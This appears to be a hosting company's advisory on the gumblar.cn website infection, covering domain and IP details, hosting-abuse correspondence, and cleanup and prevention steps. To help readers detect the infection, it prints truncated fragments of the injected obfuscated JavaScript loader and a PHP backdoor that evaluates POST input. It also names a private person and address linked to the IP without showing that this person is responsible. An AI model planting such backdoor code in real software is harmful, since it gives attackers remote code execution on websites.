One Supreme Center Hosting customer had an unrelenting experience with this exploit for over a month. Almost as soon as it was removed it would come back. The gumblar .cn exploit is said to include 1350 scripting exploits and 12 trojans. The gumblar .cn domain is currently blacklisted by Google. Google reports that it has 24 scripting exploit(s), 6 trojan(s). Here is some information we obtained on gumblar .cn:
Domain: gumblar. cn
IP: 94.229.65.172
Reverse Lookup: no.rdns-yet.ukservers.com
Registrant: TiankaiCui cuitiankai@googlemail.com
An IP address lookup found it was associated with:
Alexander A Solovyov
LIMT Group Ltd.
Karpinskogo 97a
Moscow
111423
Russian Federation
The ARIN info on the IP address “belongs to” UK Dedicated Servers Limited. We contacted UK Dedicated Servers abuse department via email and received this response from David Howes:
“Thanks for your concern, we have been made aware of this issue already and removed this server from our network. We are now in the process of contacting the relevant authorities to provide them with as much information as possible.”
“Having spent the last hour or so researching this compromise/exploit it does seem to have been around for a little while, and I am rather surprised that given the number of newsgroup/forum/blog articles etc regarding it you are the first to have contacted us about it.
I only found out about the issue a couple of hours ago, when it was pointed out to me by an acquaintance. I decided to look through our abuse inbox to see if there was any reference to it and yours was the only email we have on the subject!!”
Not sure if you have been infected? Hop on over to Unmask Parasites and scan your website.
If you are fighting this exploit, here are some things you need to know.
Infected websites contain JavaScript code that may look like this [partial code displayed]:
(function(jil){var xR5p=’%';eval(unescape((
Every infected website has it’s own version of the script, with each version having common code which can easily identify the malicious code as the gumblar .cn exploit.
The javascript code starts with “(function(.” The function has no name and some characters are replaced with their numeric value. The “%” character is replaced with some arbitrary character. Near the end of the script there is a “.replace(” function. If the function accepts variables, at the very end you might find a regular expression such as /”/g or /~/g that will decrypt the “%” character.
When the script is executed, another script is loaded and executed. This code is usually injected right before the body tag but can be found in other parts of the page. Unlike the recent iframe exploits, the gumblar exploit is injected into every web page including .js (JavaScript) files [usually at the bottom]. Perhaps coincidental, its seems most of the infected sites use PHP.
PHP files contain code that may look like this [partial code displayed]:
< ?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))
eval($_POST['tmp_lkojfghx3']);if(!defined(’TMP_XHGFJOKL’))
define(’TMP_XHGFJOKL’,base64_decode
It is safe to say that the exploit is not server-wide. We checked the server our client is on and it was the only site that was infected. The exploit may be caused by compromised FTP credentials.
A good place to start is with your own computer. Scan it for malware/spyware/virus’s. You might try downloading and scanning your system with Malwarebytes. Update the software and run it in safemode (press F8 on startup) and remove all malware from your system, if present.
After you have completely scanned your system, change FTP passwords. It also would not hurt to change ALL passwords [cPanel, MySQL databases]. Then remove the malicious code from all infected files (.html, .php, .js). If you have a backup of your website, use it. We ended up having to delete all files from our clients account and restored a full backup – so far, so good.
Malicious code has been know to use older versions of Adobe Acrobat Reader. The adobe_updater can be a legitimate Adobe Auto Updater service that starts every time you launch Adobe products. Since the virus needs to open Acrobat Reader, it also triggers the updater. There are known security issues in the latest (9.1) version of Adobe Acrobat Reader, and Adobe suggests that you disable the JavaScript support altogether.
It has also been suggested that Adobe Flash Player may also be affected. When updating Adobe Acrobat Reader, you should update Adobe Flash Player as well.
Exploit Infection Prevention
How does one prevent the spread of a nasty virus? First, thoroughly wash your hands with soap & water [yes, you do need to use soap!]. After you hands are free of all nasal mucus, update your anti-virus and malware/spyware applications.
It is said that resistance to, and recovery from viral infections, will depend on the interactions that occur between virus and host. To prevent or limit infection, the host needs barriers that are inherent to the organism. These barriers represent the first line of defense which function to prevent or limit infection. Its no secret that Internet Explorer lacks the necessary barriers. Stop using Internet Explorer. We suggest that you use Firefox with the NoScript add-on. As Benjamin Franklin said, “An ounce of prevention is worth a pound of cure.”
Update your scripts to the latest version[s]. Keeping them updated is your responsibility as a hosting customer.
